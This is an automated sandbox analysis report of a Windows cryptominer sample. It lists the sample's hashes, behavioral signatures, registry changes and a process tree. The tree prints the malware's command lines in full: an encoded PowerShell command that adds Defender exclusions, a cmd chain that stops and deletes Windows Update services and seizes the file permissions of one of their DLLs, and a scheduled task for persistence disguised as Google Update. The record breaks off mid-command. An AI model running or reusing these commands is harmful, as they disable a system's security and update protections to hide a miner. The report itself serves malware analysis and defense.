Analysis
-
max time kernel
299s -
max time network
291s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
16-05-2022 00:51
Static task
static1
Behavioral task
behavioral1
Sample
a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
Resource
win7-20220414-en
General
-
Target
a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
-
Size
7.6MB
-
MD5
95104aa61ed30687c13e5c644d5722f3
-
SHA1
f9788f808044d448f73203d93da0021cefb781ff
-
SHA256
a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
-
SHA512
99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
XMRig Miner Payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/4544-380-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/4544-381-0x000000014036DB84-mapping.dmp xmrig behavioral2/memory/4544-382-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/4544-383-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/4544-397-0x0000000140000000-0x0000000140803000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
services.exepid process 3472 services.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4560 takeown.exe 4516 icacls.exe 4956 takeown.exe 4968 icacls.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4560 takeown.exe 4516 icacls.exe 4956 takeown.exe 4968 icacls.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.execonhost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
conhost.exedescription pid process target process PID 4216 set thread context of 2128 4216 conhost.exe conhost.exe PID 4216 set thread context of 4544 4216 conhost.exe svchost.exe -
Drops file in Program Files directory 3 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Program Files\Google\Libs\WR64.sys conhost.exe File created C:\Program Files\Windows\services.exe conhost.exe File opened for modification C:\Program Files\Windows\services.exe conhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 52 IoCs
Processes:
conhost.exepowershell.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 4708 reg.exe 1336 reg.exe 4424 reg.exe 4856 reg.exe 4264 reg.exe 3644 reg.exe 4412 reg.exe 4912 reg.exe 4932 reg.exe 4576 reg.exe 4340 reg.exe 5004 reg.exe 1536 reg.exe 4988 reg.exe 5024 reg.exe 1956 reg.exe 2884 reg.exe 1820 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.execonhost.exepowershell.execonhost.exesvchost.exepid process 1676 powershell.exe 1676 powershell.exe 1676 powershell.exe 2456 conhost.exe 532 powershell.exe 532 powershell.exe 532 powershell.exe 4216 conhost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe 4544 svchost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 640 -
Suspicious use of AdjustPrivilegeToken 41 IoCs
Processes:
powershell.execonhost.exetakeown.exepowershell.execonhost.exetakeown.exesvchost.exedescription pid process Token: SeDebugPrivilege 1676 powershell.exe Token: SeIncreaseQuotaPrivilege 1676 powershell.exe Token: SeSecurityPrivilege 1676 powershell.exe Token: SeTakeOwnershipPrivilege 1676 powershell.exe Token: SeLoadDriverPrivilege 1676 powershell.exe Token: SeSystemProfilePrivilege 1676 powershell.exe Token: SeSystemtimePrivilege 1676 powershell.exe Token: SeProfSingleProcessPrivilege 1676 powershell.exe Token: SeIncBasePriorityPrivilege 1676 powershell.exe Token: SeCreatePagefilePrivilege 1676 powershell.exe Token: SeBackupPrivilege 1676 powershell.exe Token: SeRestorePrivilege 1676 powershell.exe Token: SeShutdownPrivilege 1676 powershell.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeSystemEnvironmentPrivilege 1676 powershell.exe Token: SeRemoteShutdownPrivilege 1676 powershell.exe Token: SeUndockPrivilege 1676 powershell.exe Token: SeManageVolumePrivilege 1676 powershell.exe Token: 33 1676 powershell.exe Token: 34 1676 powershell.exe Token: 35 1676 powershell.exe Token: 36 1676 powershell.exe Token: SeDebugPrivilege 2456 conhost.exe Token: SeTakeOwnershipPrivilege 4956 takeown.exe Token: SeDebugPrivilege 532 powershell.exe Token: SeAssignPrimaryTokenPrivilege 532 powershell.exe Token: SeIncreaseQuotaPrivilege 532 powershell.exe Token: SeSecurityPrivilege 532 powershell.exe Token: SeTakeOwnershipPrivilege 532 powershell.exe Token: SeLoadDriverPrivilege 532 powershell.exe Token: SeSystemtimePrivilege 532 powershell.exe Token: SeBackupPrivilege 532 powershell.exe Token: SeRestorePrivilege 532 powershell.exe Token: SeShutdownPrivilege 532 powershell.exe Token: SeSystemEnvironmentPrivilege 532 powershell.exe Token: SeUndockPrivilege 532 powershell.exe Token: SeManageVolumePrivilege 532 powershell.exe Token: SeDebugPrivilege 4216 conhost.exe Token: SeTakeOwnershipPrivilege 4560 takeown.exe Token: SeLockMemoryPrivilege 4544 svchost.exe Token: SeLockMemoryPrivilege 4544 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.execonhost.execmd.execmd.execmd.execmd.exeservices.exedescription pid process target process PID 2300 wrote to memory of 2456 2300 a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe conhost.exe PID 2300 wrote to memory of 2456 2300 a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe conhost.exe PID 2300 wrote to memory of 2456 2300 a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe conhost.exe PID 2456 wrote to memory of 3740 2456 conhost.exe cmd.exe PID 2456 wrote to memory of 3740 2456 conhost.exe cmd.exe PID 3740 wrote to memory of 1676 3740 cmd.exe powershell.exe PID 3740 wrote to memory of 1676 3740 cmd.exe powershell.exe PID 2456 wrote to memory of 1340 2456 conhost.exe cmd.exe PID 2456 wrote to memory of 1340 2456 conhost.exe cmd.exe PID 1340 wrote to memory of 4496 1340 cmd.exe sc.exe PID 1340 wrote to memory of 4496 1340 cmd.exe sc.exe PID 1340 wrote to memory of 2716 1340 cmd.exe sc.exe PID 1340 wrote to memory of 2716 1340 cmd.exe sc.exe PID 1340 wrote to memory of 4700 1340 cmd.exe sc.exe PID 1340 wrote to memory of 4700 1340 cmd.exe sc.exe PID 1340 wrote to memory of 1540 1340 cmd.exe sc.exe PID 1340 wrote to memory of 1540 1340 cmd.exe sc.exe PID 1340 wrote to memory of 4384 1340 cmd.exe sc.exe PID 1340 wrote to memory of 4384 1340 cmd.exe sc.exe PID 1340 wrote to memory of 4856 1340 cmd.exe reg.exe PID 1340 wrote to memory of 4856 1340 cmd.exe reg.exe PID 1340 wrote to memory of 4708 1340 cmd.exe reg.exe PID 1340 wrote to memory of 4708 1340 cmd.exe reg.exe PID 2456 wrote to memory of 4732 2456 conhost.exe cmd.exe PID 2456 wrote to memory of 4732 2456 conhost.exe cmd.exe PID 1340 wrote to memory of 4912 1340 cmd.exe reg.exe PID 1340 wrote to memory of 4912 1340 cmd.exe reg.exe PID 1340 wrote to memory of 4932 1340 cmd.exe reg.exe PID 1340 wrote to memory of 4932 1340 cmd.exe reg.exe PID 4732 wrote to memory of 4940 4732 cmd.exe schtasks.exe PID 4732 wrote to memory of 4940 4732 cmd.exe schtasks.exe PID 1340 wrote to memory of 4576 1340 cmd.exe reg.exe PID 1340 wrote to memory of 4576 1340 cmd.exe reg.exe PID 1340 wrote to memory of 4956 1340 cmd.exe takeown.exe PID 1340 wrote to memory of 4956 1340 cmd.exe takeown.exe PID 1340 wrote to memory of 4968 1340 cmd.exe icacls.exe PID 1340 wrote to memory of 4968 1340 cmd.exe icacls.exe PID 1340 wrote to memory of 4340 1340 cmd.exe reg.exe PID 1340 wrote to memory of 4340 1340 cmd.exe reg.exe PID 1340 wrote to memory of 4988 1340 cmd.exe reg.exe PID 1340 wrote to memory of 4988 1340 cmd.exe reg.exe PID 1340 wrote to memory of 5004 1340 cmd.exe reg.exe PID 1340 wrote to memory of 5004 1340 cmd.exe reg.exe PID 1340 wrote to memory of 5024 1340 cmd.exe reg.exe PID 1340 wrote to memory of 5024 1340 cmd.exe reg.exe PID 1340 wrote to memory of 5064 1340 cmd.exe schtasks.exe PID 1340 wrote to memory of 5064 1340 cmd.exe schtasks.exe PID 1340 wrote to memory of 5100 1340 cmd.exe schtasks.exe PID 1340 wrote to memory of 5100 1340 cmd.exe schtasks.exe PID 1340 wrote to memory of 1860 1340 cmd.exe schtasks.exe PID 1340 wrote to memory of 1860 1340 cmd.exe schtasks.exe PID 1340 wrote to memory of 2744 1340 cmd.exe schtasks.exe PID 1340 wrote to memory of 2744 1340 cmd.exe schtasks.exe PID 1340 wrote to memory of 2724 1340 cmd.exe schtasks.exe PID 1340 wrote to memory of 2724 1340 cmd.exe schtasks.exe PID 1340 wrote to memory of 5112 1340 cmd.exe schtasks.exe PID 1340 wrote to memory of 5112 1340 cmd.exe schtasks.exe PID 1340 wrote to memory of 1388 1340 cmd.exe schtasks.exe PID 1340 wrote to memory of 1388 1340 cmd.exe schtasks.exe PID 2456 wrote to memory of 3236 2456 conhost.exe cmd.exe PID 2456 wrote to memory of 3236 2456 conhost.exe cmd.exe PID 3236 wrote to memory of 3312 3236 cmd.exe schtasks.exe PID 3236 wrote to memory of 3312 3236 cmd.exe schtasks.exe PID 3472 wrote to memory of 4216 3472 services.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
-
C:\Program Files\Windows\services.exe"C:\Program Files\Windows\services.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN 